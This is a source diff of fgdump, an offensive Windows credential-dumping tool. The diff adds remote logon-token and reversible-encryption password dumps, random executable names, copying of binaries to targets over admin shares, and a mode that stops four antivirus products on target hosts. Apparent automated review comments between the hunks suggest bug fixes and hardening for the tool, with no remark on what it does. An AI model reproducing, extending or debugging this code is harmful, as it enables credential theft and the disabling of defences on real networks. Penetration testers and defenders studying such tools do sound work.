Index: fgdump.rc
===================================================================
--- fgdump.rc	(revision 1246)
+++ fgdump.rc	(revision 1355)
@@ -57,6 +57,8 @@
 IDR_CACHEDUMP64         BIN                     "cachedump64.exe"
 IDR_PWDUMP              BIN                     "PwDump.exe"
 IDR_FGEXEC              BIN                     "fgexec.exe"
+IDR_WHOSTHERE           BIN                     "whosthere.exe"
+IDR_REVDUMP             BIN                     "revdump.exe"
 
 /////////////////////////////////////////////////////////////////////////////
 //
Index: pstgdump/Release/pstgdump.exe
===================================================================
Cannot display: file marked as a binary type.
svn:mime-type = application/octet-stream
Index: pstgdump/pstgdump.vcproj
===================================================================
--- pstgdump/pstgdump.vcproj	(revision 1246)
+++ pstgdump/pstgdump.vcproj	(revision 1355)
@@ -1,110 +1,173 @@
 <?xml version="1.0" encoding="Windows-1252"?>
 <VisualStudioProject
 	ProjectType="Visual C++"
-	Version="7.10"
+	Version="9.00"
 	Name="pstgdump"
 	ProjectGUID="{7A87DEAE-7B94-4986-9294-BD69B12A9732}"
-	Keyword="Win32Proj">
+	Keyword="Win32Proj"
+	TargetFrameworkVersion="131072"
+	>
 	<Platforms>
 		<Platform
-			Name="Win32"/>
+			Name="Win32"
+		/>
 	</Platforms>
+	<ToolFiles>
+	</ToolFiles>
 	<Configurations>
 		<Configuration
 			Name="Debug|Win32"
 			OutputDirectory="Debug"
 			IntermediateDirectory="Debug"
 			ConfigurationType="1"
-			CharacterSet="2">
+			InheritedPropertySheets="$(VCInstallDir)VCProjectDefaults\UpgradeFromVC71.vsprops"
+			CharacterSet="2"
+			>
 			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
 				Name="VCCLCompilerTool"
 				Optimization="0"
 				PreprocessorDefinitions="WIN32;_DEBUG;_CONSOLE"
-				MinimalRebuild="TRUE"
+				MinimalRebuild="true"
 				BasicRuntimeChecks="3"
-				RuntimeLibrary="5"
-				UsePrecompiledHeader="3"
+				RuntimeLibrary="1"
+				UsePrecompiledHeader="2"
 				WarningLevel="3"
-				Detect64BitPortabilityProblems="TRUE"
-				DebugInformationFormat="4"/>
+				Detect64BitPortabilityProblems="true"
+				DebugInformationFormat="4"
+			/>
 			<Tool
-				Name="VCCustomBuildTool"/>
+				Name="VCManagedResourceCompilerTool"
+			/>
 			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
 				Name="VCLinkerTool"
 				AdditionalDependencies="crypt32.lib"
 				OutputFile="$(OutDir)/pstgdump.exe"
 				LinkIncremental="2"
-				GenerateDebugInformation="TRUE"
+				GenerateDebugInformation="true"
 				ProgramDatabaseFile="$(OutDir)/pstgdump.pdb"
 				SubSystem="1"
-				TargetMachine="1"/>
+				RandomizedBaseAddress="1"
+				DataExecutionPrevention="0"
+				TargetMachine="1"
+			/>
 			<Tool
-				Name="VCMIDLTool"/>
+				Name="VCALinkTool"
+			/>
 			<Tool
-				Name="VCPostBuildEventTool"/>
+				Name="VCManifestTool"
+			/>
 			<Tool
-				Name="VCPreBuildEventTool"/>
+				Name="VCXDCMakeTool"
+			/>
 			<Tool
-				Name="VCPreLinkEventTool"/>
+				Name="VCBscMakeTool"
+			/>
 			<Tool
-				Name="VCResourceCompilerTool"/>
+				Name="VCFxCopTool"
+			/>
 			<Tool
-				Name="VCWebServiceProxyGeneratorTool"/>
+				Name="VCAppVerifierTool"
+			/>
 			<Tool
-				Name="VCXMLDataGeneratorTool"/>
-			<Tool
-				Name="VCWebDeploymentTool"/>
-			<Tool
-				Name="VCManagedWrapperGeneratorTool"/>
-			<Tool
-				Name="VCAuxiliaryManagedWrapperGeneratorTool"/>
+				Name="VCPostBuildEventTool"
+			/>
 		</Configuration>
 		<Configuration
 			Name="Release|Win32"
 			OutputDirectory="Release"
 			IntermediateDirectory="Release"
 			ConfigurationType="1"
-			CharacterSet="2">
+			InheritedPropertySheets="$(VCInstallDir)VCProjectDefaults\UpgradeFromVC71.vsprops"
+			CharacterSet="2"
+			>
 			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
 				Name="VCCLCompilerTool"
 				PreprocessorDefinitions="WIN32;NDEBUG;_CONSOLE"
-				RuntimeLibrary="4"
-				UsePrecompiledHeader="3"
+				RuntimeLibrary="0"
+				UsePrecompiledHeader="2"
 				WarningLevel="3"
-				Detect64BitPortabilityProblems="TRUE"
-				DebugInformationFormat="3"/>
+				Detect64BitPortabilityProblems="true"
+				DebugInformationFormat="3"
+			/>
 			<Tool
-				Name="VCCustomBuildTool"/>
+				Name="VCManagedResourceCompilerTool"
+			/>
 			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
 				Name="VCLinkerTool"
 				AdditionalDependencies="crypt32.lib"
 				OutputFile="$(OutDir)/pstgdump.exe"
 				LinkIncremental="1"
-				GenerateDebugInformation="TRUE"
+				GenerateDebugInformation="true"
 				SubSystem="1"
 				OptimizeReferences="2"
 				EnableCOMDATFolding="2"
-				TargetMachine="1"/>
+				RandomizedBaseAddress="1"
+				DataExecutionPrevention="0"
+				TargetMachine="1"
+			/>
 			<Tool
-				Name="VCMIDLTool"/>
+				Name="VCALinkTool"
+			/>
 			<Tool
-				Name="VCPostBuildEventTool"/>
+				Name="VCManifestTool"
+			/>
 			<Tool
-				Name="VCPreBuildEventTool"/>
+				Name="VCXDCMakeTool"
+			/>
 			<Tool
-				Name="VCPreLinkEventTool"/>
+				Name="VCBscMakeTool"
+			/>
 			<Tool
-				Name="VCResourceCompilerTool"/>
+				Name="VCFxCopTool"
+			/>
 			<Tool
-				Name="VCWebServiceProxyGeneratorTool"/>
+				Name="VCAppVerifierTool"
+			/>
 			<Tool
-				Name="VCXMLDataGeneratorTool"/>
-			<Tool
-				Name="VCWebDeploymentTool"/>
-			<Tool
-				Name="VCManagedWrapperGeneratorTool"/>
-			<Tool
-				Name="VCAuxiliaryManagedWrapperGeneratorTool"/>
+				Name="VCPostBuildEventTool"
+			/>
 		</Configuration>
 	</Configurations>
 	<References>
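Review bot: The VCLinkerTool blocks added to both the Debug and Release configurations carry `RandomizedBaseAddress="1"` and `DataExecutionPrevention="0"`; in the VS2008 project schema the former is /DYNAMICBASE:NO, so the linked pstgdump.exe is built without ASLR, and the latter leaves /NXCOMPAT at the linker default rather than opting in. If these came from the UpgradeFromVC71 wizard rather than a deliberate choice, the Release configuration at least should use `RandomizedBaseAddress="2"` and `DataExecutionPrevention="2"` so the shipped binary gets both mitigations. Worth a comment in the project (or the commit message) if disabling ASLR is intentional, since nothing in the hunk explains it.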
@@ -113,53 +176,68 @@
 		<Filter
 			Name="Source Files"
 			Filter="cpp;c;cxx;def;odl;idl;hpj;bat;asm;asmx"
-			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}">
+			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
+			>
 			<File
-				RelativePath=".\ProtectedStorage.cpp">
+				RelativePath=".\ProtectedStorage.cpp"
+				>
 			</File>
 			<File
-				RelativePath=".\pstgdump.cpp">
+				RelativePath=".\pstgdump.cpp"
+				>
 			</File>
 			<File
-				RelativePath=".\stdafx.cpp">
+				RelativePath=".\stdafx.cpp"
+				>
 				<FileConfiguration
-					Name="Debug|Win32">
+					Name="Debug|Win32"
+					>
 					<Tool
 						Name="VCCLCompilerTool"
-						UsePrecompiledHeader="1"/>
+						UsePrecompiledHeader="1"
+					/>
 				</FileConfiguration>
 				<FileConfiguration
-					Name="Release|Win32">
+					Name="Release|Win32"
+					>
 					<Tool
 						Name="VCCLCompilerTool"
-						UsePrecompiledHeader="1"/>
+						UsePrecompiledHeader="1"
+					/>
 				</FileConfiguration>
 			</File>
 			<File
-				RelativePath=".\XGetopt.cpp">
+				RelativePath=".\XGetopt.cpp"
+				>
 			</File>
 		</Filter>
 		<Filter
 			Name="Header Files"
 			Filter="h;hpp;hxx;hm;inl;inc;xsd"
-			UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}">
+			UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
+			>
 			<File
-				RelativePath=".\ProtectedStorage.h">
+				RelativePath=".\ProtectedStorage.h"
+				>
 			</File>
 			<File
-				RelativePath=".\debug\pstorec.tlh">
+				RelativePath=".\debug\pstorec.tlh"
+				>
 			</File>
 			<File
-				RelativePath=".\stdafx.h">
+				RelativePath=".\stdafx.h"
+				>
 			</File>
 			<File
-				RelativePath=".\XGetopt.h">
+				RelativePath=".\XGetopt.h"
+				>
 			</File>
 		</Filter>
 		<Filter
 			Name="Resource Files"
 			Filter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx"
-			UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}">
+			UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}"
+			>
 		</Filter>
 	</Files>
 	<Globals>
Index: pstgdump/Debug/pstgdump.exe
===================================================================
Cannot display: file marked as a binary type.
svn:mime-type = application/octet-stream
Index: fgdump.cpp
===================================================================
--- fgdump.cpp	(revision 1246)
+++ fgdump.cpp	(revision 1355)
@@ -33,6 +33,8 @@
 	bFullRun = true;
 	bRunPwdump = true;
 	bRunCachedump = true;
+	bRunWhosThere = false;
+	bRunRevDump = false;
 	bRunPStgDump = false;
 	bSkipExisting = true;
 	bContinueOnUnknownAV = false;
@@ -50,6 +52,7 @@
 	bSkipPwdumpHistory = false;
 	bRunLocal = false;
 	bSkipAVCheck = false;
+	bToggleAV = false;
 	nOSBits = 0;	// OS 32/64 flag has not been overridden
 
 	memset(lpszSourceFile, 0, MAX_PATH + 1);
@@ -120,6 +123,12 @@
 	bFullRun = !bTestOnly;
 }
 
+void FGDump::SetToggleOnlyAV(bool bToggleOnly)
+{
+	bToggleAV = bToggleOnly;
+	bFullRun = false;
+}
+
 void FGDump::SetSkipCacheDump(bool bSkip)
 {
 	bRunCachedump = !bSkip;
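Review bot: SetToggleOnlyAV clears bFullRun unconditionally, so its bToggleOnly argument only ever reaches bToggleAV; calling it with false still leaves the full run disabled, unlike the neighbouring test-only setter just above it, which writes `bFullRun = !bTestOnly;`. Mirroring that with `bFullRun = !bToggleOnly;` keeps the two setters consistent, or the parameter should be dropped if the method is only meant to enable the mode. Either way a one-line comment on the method stating that toggle mode, like test-only mode, suppresses the dumps themselves would save the next reader a trip to HostDumper.cpp.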
@@ -129,7 +138,17 @@
 {
 	bRunPwdump = !bSkip;
 }
+void FGDump::SetSkipWhosThere(bool bSkip)
+{
+	bRunWhosThere = !bSkip;
+}
 
+void FGDump::SetSkipRevDump(bool bSkip)
+{
+	bRunRevDump = !bSkip;
+}
+
+
 void FGDump::SetSkipProtectedStorageDump(bool bSkip)
 {
 	bRunPStgDump = !bSkip;
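Review bot: Formatting in this hunk is inconsistent: SetSkipWhosThere is glued to the closing brace of the preceding setter (the one writing bRunPwdump) with no blank line, while SetSkipRevDump is followed by two. The naming is also a double negative from the caller's side — Main.cpp enables these opt-in runs with `SetSkipWhosThere(false)` and `SetSkipRevDump(false)` — whereas "skip" reads naturally for cachedump and pwdump, which default to on. Since bRunWhosThere and bRunRevDump are initialised to false, a `SetRunWhosThere(bool bRun)` / `SetRunRevDump(bool bRun)` pair, or at least a comment on each setter stating that the default is off, would make the intent clearer.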
@@ -201,7 +220,7 @@
 {
 	ResourceLoader objResPWDump, objResFGExec;
 	ResourceLoader objLSADump, objResCacheDump, objResPStgDump;
-	ResourceLoader objResCacheDump64;
+	ResourceLoader objResCacheDump64, objResWhosThere, objResRevDump;
 	size_t nLen;
 	FILE* fileInput = NULL;
 	char szPwdTemp[101];
@@ -259,7 +278,7 @@
 		SetPassword(szPwdTemp);
 	}
 
-	if ((bRunCachedump == false && bRunPwdump == false) && bFullRun == true)
+	if ((bRunCachedump == false && bRunPwdump == false && bRunWhosThere == false && bRunRevDump == false) && bFullRun == true)
 	{
 		Log.ReportError(CRITICAL, "ERROR: You cannot specify -c *and* -w, unless you use -t\n");
 		ExitApp(1);
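Review bot: The condition now also requires bRunWhosThere and bRunRevDump to be false before reporting the "nothing to do" case, but the message still names only -c, -w and the -t escape, so a user who hits it is not told that -x or -y would have made the run valid; something like `"ERROR: You cannot specify -c *and* -w without -x or -y, unless you use -t\n"` would match the new check. bRunPStgDump is still not part of the condition, so `-c -w -s` continues to trip the error — if that is not intended, `&& bRunPStgDump == false` belongs in the same expression. The enclosing function begins and ends outside the hunk.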
@@ -299,6 +318,8 @@
     memset(lpszPWDumpPath, 0, MAX_PATH + 15);
 	memset(lpszFGExecPath, 0, MAX_PATH + 15);
 	memset(lpszCacheDumpPath, 0, MAX_PATH + 15);
+	memset(lpszWhosTherePath, 0, MAX_PATH + 15);
+	memset(lpszRevDumpPath, 0, MAX_PATH + 15);
 	memset(lpszPStoragePath, 0, MAX_PATH + 15);
 	memset(lpszCacheDump64Path, 0, MAX_PATH + 15);
 
@@ -308,12 +329,18 @@
 	RandomName::GetRandomName((char**)&temp, 5, 10, "exe");
 	temp = lpszFgExecExeName;
 	RandomName::GetRandomName((char**)&temp, 5, 10, "exe");
+	temp = lpszWhosThereExeName;
+	RandomName::GetRandomName((char**)&temp, 5, 10, "exe");
+	temp = lpszRevDumpExeName;
+	RandomName::GetRandomName((char**)&temp, 5, 10, "exe");
 
 	_snprintf(lpszPWDumpPath, MAX_PATH + 15, "%s%s", lpszTempPath, "pwdump.exe");
 	_snprintf(lpszFGExecPath, MAX_PATH + 15, "%s%s", lpszTempPath, lpszFgExecExeName);
 	_snprintf(lpszCacheDumpPath, MAX_PATH + 15, "%s%s", lpszTempPath, lpszCacheDumpExeName);
 	_snprintf(lpszPStoragePath, MAX_PATH + 15, "%s%s", lpszTempPath, "pstgdump.exe");
 	_snprintf(lpszCacheDump64Path, MAX_PATH + 15, "%s%s", lpszTempPath, lpszCacheDump64ExeName);
+	_snprintf(lpszWhosTherePath, MAX_PATH + 15, "%s%s", lpszTempPath, lpszWhosThereExeName);
+	_snprintf(lpszRevDumpPath, MAX_PATH + 15, "%s%s", lpszTempPath, lpszRevDumpExeName);
 
 	// If antivirus is running locally, turn it off, since it may disrupt the storage
 	// of the worker files locally. Only do this if the user hasn't disabled it.
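Review bot: The two new _snprintf calls that build lpszWhosTherePath and lpszRevDumpPath pass `MAX_PATH + 15` as the count for buffers declared as exactly `char[MAX_PATH + 15]` in fgdump.h, so a temp path plus executable name that fills the buffer is left without a terminator — the earlier memset only helps when the result is shorter than the buffer. The pre-existing pwdump, fgexec and cachedump lines share the pattern, so the new lines inherit it; using `MAX_PATH + 14` as the count (or `_snprintf_s` with `_TRUNCATE`) on all of them guarantees termination. The enclosing function continues outside the hunk.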
@@ -349,6 +376,10 @@
 		ExitApp(1);
 	if (!objResCacheDump64.UnpackResource(IDR_CACHEDUMP64, lpszCacheDump64Path))
 		ExitApp(1);
+	if (!objResWhosThere.UnpackResource(IDR_WHOSTHERE, lpszWhosTherePath))
+		ExitApp(1);
+	if (!objResRevDump.UnpackResource(IDR_REVDUMP, lpszRevDumpPath))
+		ExitApp(1);
 
 	// Set up the thread pool
 	CreateThreadPool();
Index: RevDumpControl.h
===================================================================
--- RevDumpControl.h	(revision 0)
+++ RevDumpControl.h	(revision 1355)
@@ -0,0 +1,37 @@
+/******************************************************************************
+fgdump - by fizzgig and the foofus.net group
+Copyright (C) 2010 by JoMo-Kun
+http://www.foofus.net
+
+This program is free software; you can redistribute it and/or
+modify it under the terms of the GNU General Public License
+as published by the Free Software Foundation; either version 2
+of the License, or (at your option) any later version.
+
+This program is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+GNU General Public License for more details.
+
+You should have received a copy of the GNU General Public License
+along with this program; if not, write to the Free Software
+Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
+******************************************************************************/
+#pragma once
+#ifndef _REVDUMPCONTROL_H
+#define _REVDUMPCONTROL_H
+
+class RevDumpControl
+{
+public:
+	RevDumpControl(LONG nCacheID = -1);
+	~RevDumpControl(void);
+
+	bool Execute(const char* lpszPSExecPath, const char* lpszDumpPath, char* lpszMachine, char* lpszExeName, char* lpszPipeName = NULL);
+
+private:
+	LONG m_nCacheID;
+
+};
+
+#endif
\ No newline at end of file
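Review bot: RevDumpControl's constructor takes a single LONG with a default, so it doubles as an implicit conversion from any integer; `explicit RevDumpControl(LONG nCacheID = -1);` prevents accidental construction. `#pragma once` together with a `_REVDUMPCONTROL_H` guard is redundant, and identifiers beginning with an underscore and a capital letter are reserved; the `char*` parameters of Execute that are only read in the implementation — lpszMachine, lpszExeName, lpszPipeName — could be `const char*` like the first two. The class carries no documentation; a short comment on Execute stating that a NULL lpszPipeName selects the local run path and that the return value reports whether the tool's output was captured and written to `<machine>.revdump` would tell callers what to expect. The file also lacks a trailing newline.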
Index: HostDumper.cpp
===================================================================
--- HostDumper.cpp	(revision 1246)
+++ HostDumper.cpp	(revision 1355)
@@ -20,6 +20,8 @@
 #include "StdAfx.h"
 #include "hostdumper.h"
 #include "CacheDumpControl.h"
+#include "WhosThereControl.h"
+#include "RevDumpControl.h"
 #include "ProtectedStorageControl.h"
 #include "ServiceControl.h"
 #include "Impersonator.h"
@@ -81,7 +83,7 @@
 	PWDumpControl objPWDump(nCacheID);
 	Impersonator impersonate(nCacheID);
 	char szPath[MAX_PATH + 1];
-	bool bSkipPwdump = false, bSkipCachedump = false, bSkipPStg = true;
+	bool bSkipPwdump = false, bSkipCachedump = false, bSkipWhosThere = false, bSkipPStg = true, bSkipRevDump = false;
 	char* szWindowsVersion;
 	GUID guidPipe;
 	WCHAR wszGUID[CHARS_IN_GUID + 1];
@@ -121,12 +123,24 @@
 			Log.CachedReportError(nCacheID, INFO, "INFO: skipping cachedump on %s because %s exists or I was told to skip cache dumps\n", lpszServer, szPath);
 
 		memset(szPath, 0, MAX_PATH + 1);
+		_snprintf(szPath, MAX_PATH, "%s.whosthere", lpszServer);
+		bSkipWhosThere = (FileExists(szPath) && fgdumpMain->bSkipExisting) || !fgdumpMain->bRunWhosThere;
+		if (bSkipWhosThere)
+			Log.CachedReportError(nCacheID, INFO, "INFO: skipping token dump on %s because %s exists or I was told to skip token dumps\n", lpszServer, szPath);
+
+		memset(szPath, 0, MAX_PATH + 1);
+		_snprintf(szPath, MAX_PATH, "%s.revdump", lpszServer);
+		bSkipRevDump = (FileExists(szPath) && fgdumpMain->bSkipExisting) || !fgdumpMain->bRunRevDump;
+		if (bSkipRevDump)
+			Log.CachedReportError(nCacheID, INFO, "INFO: skipping reversible encryption value dump on %s because %s exists or I was told to skip reversible encryption dumps\n", lpszServer, szPath);
+
+		memset(szPath, 0, MAX_PATH + 1);
 		_snprintf(szPath, MAX_PATH, "%s.lsadump", lpszServer);
 		bSkipPStg = (FileExists(szPath) && fgdumpMain->bSkipExisting) || !fgdumpMain->bRunPStgDump;
 		if (bSkipPStg)
 			Log.CachedReportError(nCacheID, INFO, "INFO: skipping dump of protected storage secrets on %s because %s exists or I was told to skip LSA dumps\n", lpszServer, szPath);
 
-		if (bSkipCachedump && bSkipPwdump && bSkipPStg)
+		if (bSkipCachedump && bSkipPwdump && bSkipWhosThere && bSkipPStg && bSkipRevDump)
 		{
 			Log.CachedReportError(nCacheID, CRITICAL, "Skipping: nothing to do\n");
 			LogFailed.WriteFailedHost(lpszServer, FGDUMP_ERROR_BASE + 1, false, "Skipping: nothing to do");
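Review bot: The two new INFO messages copy the cachedump wording ("... exists or I was told to skip token dumps"), but unlike cachedump these dumps are opt-in — bRunWhosThere and bRunRevDump are initialised to false in fgdump.cpp — so in a default run every host logs two lines claiming the user asked to skip something they never enabled. Wording that reflects the opt-in default, e.g. `"INFO: skipping token dump on %s because %s exists or -x was not given\n"` and the equivalent for -y, or logging only when the file-exists branch caused the skip, would keep the log readable. The enclosing function begins and ends outside the hunk.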
@@ -220,10 +234,19 @@
 				switch(sControls.objTrendService->GetServiceState(lpszServer))
 				{
 				case AV_STOPPED:
-					Log.CachedReportError(nCacheID, fgdumpMain->bFullRun ? INFO : CRITICAL, "Trend is installed on this box, but not currently running. Leaving the service alone.\n");
+					if (fgdumpMain->bToggleAV)
+					{
+						Log.CachedReportError(nCacheID, INFO, "Trend is installed on this box, but currently not running. Restarting it as requested by user.\n");
+						bTrendAVIsRunning = true;
+					}
+					else
+					{
+						Log.CachedReportError(nCacheID, fgdumpMain->bFullRun ? INFO : CRITICAL, "Trend is installed on this box, but not currently running. Leaving the service alone.\n");
+					}
+
 					break;
 				case AV_STARTED:
-					if (fgdumpMain->bFullRun)
+					if ((fgdumpMain->bFullRun) || (fgdumpMain->bToggleAV))
 					{
 						bTrendAVIsRunning = true;
 						Log.CachedReportError(nCacheID, INFO, "Trend is running on this machine, shutting it down for a bit...\n");
@@ -232,6 +255,9 @@
 							LogFailed.WriteFailedHost(lpszServer, GetLastError(), false, "Trend AV was running but could not be stopped");
 							throw(1);
 						}
+
+						if (fgdumpMain->bToggleAV)
+							bTrendAVIsRunning = false;
 					}
 					else
 					{
@@ -259,10 +285,19 @@
 				switch(sControls.objSophosService->GetServiceState(lpszServer))
 				{
 				case AV_STOPPED:
-					Log.CachedReportError(nCacheID, fgdumpMain->bFullRun ? INFO : CRITICAL, "Sophos is installed on this box, but not currently running. Leaving the service alone but proceeding with pwdump and cachedump\n");
+					if (fgdumpMain->bToggleAV)
+					{
+						Log.CachedReportError(nCacheID, INFO, "Sophos is installed on this box, but currently not running. Restarting it as requested by user.\n");
+						bSophosAVIsRunning = true;
+					}
+					else
+					{
+						Log.CachedReportError(nCacheID, fgdumpMain->bFullRun ? INFO : CRITICAL, "Sophos is installed on this box, but not currently running. Leaving the service alone but proceeding with pwdump and cachedump\n");
+					}
+
 					break;
 				case AV_STARTED:
-					if (fgdumpMain->bFullRun)
+					if ((fgdumpMain->bFullRun) || (fgdumpMain->bToggleAV))
 					{
 						bSophosAVIsRunning = true;
 						Log.CachedReportError(nCacheID, INFO, "Sophos is running on this machine, shutting it down for a bit...\n");
@@ -271,6 +306,9 @@
 							LogFailed.WriteFailedHost(lpszServer, GetLastError(), false, "Sophos AV was running but could not be stopped");
 							throw(1);
 						}
+
+						if (fgdumpMain->bToggleAV)
+							bSophosAVIsRunning = false;
 					}
 					else
 					{
@@ -298,10 +336,19 @@
 				switch(sControls.objMcAfeeService->GetServiceState(lpszServer))
 				{
 				case AV_STOPPED:
-					Log.CachedReportError(nCacheID, fgdumpMain->bFullRun ? INFO : CRITICAL, "McAfee is installed on this box, but not currently running. Leaving the service alone but proceeding with pwdump and cachedump\n");
+					if (fgdumpMain->bToggleAV)
+					{
+						Log.CachedReportError(nCacheID, INFO, "McAfee is installed on this box, but currently not running. Restarting it as requested by user.\n");
+						bMCAVIsRunning = true;
+					}
+					else
+					{
+						Log.CachedReportError(nCacheID, fgdumpMain->bFullRun ? INFO : CRITICAL, "McAfee is installed on this box, but not currently running. Leaving the service alone but proceeding with pwdump and cachedump\n");
+					}
+
 					break;
 				case AV_STARTED:
-					if (fgdumpMain->bFullRun)
+					if ((fgdumpMain->bFullRun) || (fgdumpMain->bToggleAV))
 					{
 						bMCAVIsRunning = true;
 						Log.CachedReportError(nCacheID, INFO, "McAfee is running on this machine, shutting it down for a bit...\n");
@@ -310,6 +357,9 @@
 							LogFailed.WriteFailedHost(lpszServer, GetLastError(), false, "McAfee AV was running but could not be stopped");
 							throw(1);
 						}
+						
+						if (fgdumpMain->bToggleAV)
+							bSymantecAVIsRunning = false;
 					}
 					else
 					{
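Review bot: In the McAfee AV_STARTED branch the toggle path clears `bSymantecAVIsRunning` instead of `bMCAVIsRunning`, the flag this block set to true a few lines earlier; the Trend, Sophos and Symantec copies of the same code each clear their own flag, so this line should read `bMCAVIsRunning = false;`. As written, toggle mode leaves bMCAVIsRunning set, so whatever code later acts on that flag (outside this diff) still sees McAfee as running, and a Symantec flag is cleared from the wrong block. This hunk and the matching Trend, Sophos and Symantec hunks are four hand-copied versions of the same AV_STOPPED/AV_STARTED logic differing only in product name and flag, which is how this slip happened; one helper taking the service-control object, the product name and a reference to the flag would leave a single copy to review. The enclosing switch and the function around it begin and end outside the hunk.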
@@ -337,10 +387,19 @@
 				switch(sControls.objSAVService->GetServiceState(lpszServer))
 				{
 				case AV_STOPPED:
-					Log.CachedReportError(nCacheID, fgdumpMain->bFullRun ? INFO : CRITICAL, "Symantec is installed on this box, but not currently running. Leaving the service alone but proceeding with pwdump and cachedump\n");
+					if (fgdumpMain->bToggleAV)
+					{
+						Log.CachedReportError(nCacheID, INFO, "Symantec is installed on this box, but currently not running. Restarting it as requested by user.\n");
+						bSymantecAVIsRunning = true;
+					}
+					else
+					{
+						Log.CachedReportError(nCacheID, fgdumpMain->bFullRun ? INFO : CRITICAL, "Symantec is installed on this box, but not currently running. Leaving the service alone but proceeding with pwdump and cachedump\n");
+					}
+						
 					break;
 				case AV_STARTED:
-					if (fgdumpMain->bFullRun)
+					if ((fgdumpMain->bFullRun) || (fgdumpMain->bToggleAV))
 					{
 						bSymantecAVIsRunning = true;
 						Log.CachedReportError(nCacheID, INFO, "Symantec is running on this machine, shutting it down for a bit...\n");
@@ -349,6 +408,9 @@
 							LogFailed.WriteFailedHost(lpszServer, GetLastError(), false, "Symantec AV was running but could not be stopped");
 							throw(1);
 						}
+
+						if (fgdumpMain->bToggleAV)
+							bSymantecAVIsRunning = false;
 					}
 					else
 					{
@@ -416,6 +478,42 @@
 				}
 			}
 
+			if (!bSkipWhosThere)
+			{
+				if (bRunLocal)
+				{
+					if (RunWhosThere(fgdumpMain->lpszTempPath) == false) // Don't want a pipe for local stuff
+					{
+						LogFailed.WriteFailedHost(lpszServer, GetLastError(), false, "Token dump failed - check error log");
+					}
+				}
+				else
+				{
+					if (RunWhosThere(fgdumpMain->lpszTempPath, lpszPipeName) == false)
+					{
+						LogFailed.WriteFailedHost(lpszServer, GetLastError(), false, "Token dump failed - check error log");
+					}
+				}
+			}
+
+			if (!bSkipRevDump)
+			{
+				if (bRunLocal)
+				{
+					if (RunRevDump(fgdumpMain->lpszTempPath, NULL) == false) // Don't want a pipe for local stuff
+					{
+						LogFailed.WriteFailedHost(lpszServer, GetLastError(), false, "Reversible encryption value dump failed - check error log");
+					}
+				}
+				else
+				{
+					if (RunRevDump(fgdumpMain->lpszTempPath, lpszPipeName) == false)
+					{
+						LogFailed.WriteFailedHost(lpszServer, GetLastError(), false, "Reversible encryption value dump failed - check error log");
+					}
+				}
+			}
+
 			if (!bSkipPStg)
 			{
 				if (RunProtectedStorageDump(fgdumpMain->lpszTempPath, lpszUser, lpszPassword, lpszPipeName) == false)
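Review bot: RunWhosThere is called with a single argument in the local branch, `RunWhosThere(fgdumpMain->lpszTempPath)`, but the definition added later in this file takes `(char* lpszTempPath, char* lpszPipeName)`, so this only compiles if hostdumper.h (not in this diff) declares a default for lpszPipeName; the RevDump block directly below passes `NULL` explicitly, and the two should agree. Each block also repeats the same if/else just to choose between a NULL pipe and lpszPipeName with an identical failure message on both sides; `RunWhosThere(fgdumpMain->lpszTempPath, bRunLocal ? NULL : lpszPipeName)` with one failure check halves each block. The enclosing function begins and ends outside the hunk.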
@@ -630,6 +728,10 @@
 	DeleteFile(lpszRemotePath);
 	_snprintf(lpszRemotePath, MAX_PATH, "%s\\%s", lpszUNCRemotePath, fgdumpMain->lpszCacheDump64ExeName);
 	DeleteFile(lpszRemotePath);
+	_snprintf(lpszRemotePath, MAX_PATH, "%s\\%s", lpszUNCRemotePath, fgdumpMain->lpszWhosThereExeName);
+	DeleteFile(lpszRemotePath);
+	_snprintf(lpszRemotePath, MAX_PATH, "%s\\%s", lpszUNCRemotePath, fgdumpMain->lpszRevDumpExeName);
+	DeleteFile(lpszRemotePath);
 	_snprintf(lpszRemotePath, MAX_PATH, "%s\\%s", lpszUNCRemotePath, fgdumpMain->lpszFgExecExeName);
 	DeleteFile(lpszRemotePath);
 
@@ -652,6 +754,38 @@
 	return true;
 }
 
+bool HostDumper::RunWhosThere(char* lpszTempPath, char* lpszPipeName)
+{
+	WhosThereControl objWhosThere(nCacheID);
+
+	_snprintf(lpszRemotePath, MAX_PATH, "%s\\%s", lpszUNCRemotePath, fgdumpMain->lpszWhosThereExeName);
+	CopyFile(fgdumpMain->lpszWhosTherePath, lpszRemotePath, FALSE);
+
+	if (!objWhosThere.Execute(fgdumpMain->lpszFGExecPath, lpszCacheDumpRemotePath, lpszServer, fgdumpMain->lpszWhosThereExeName, lpszPipeName))
+	{
+		Log.CachedReportError(nCacheID, CRITICAL, "Failed to dump logon tokens\n");
+		return false;
+	}
+
+	return true;
+}
+
+bool HostDumper::RunRevDump(char* lpszTempPath, char* lpszPipeName)
+{
+	RevDumpControl objRevDump(nCacheID);
+
+	_snprintf(lpszRemotePath, MAX_PATH, "%s\\%s", lpszUNCRemotePath, fgdumpMain->lpszRevDumpExeName);
+	CopyFile(fgdumpMain->lpszRevDumpPath, lpszRemotePath, FALSE);
+
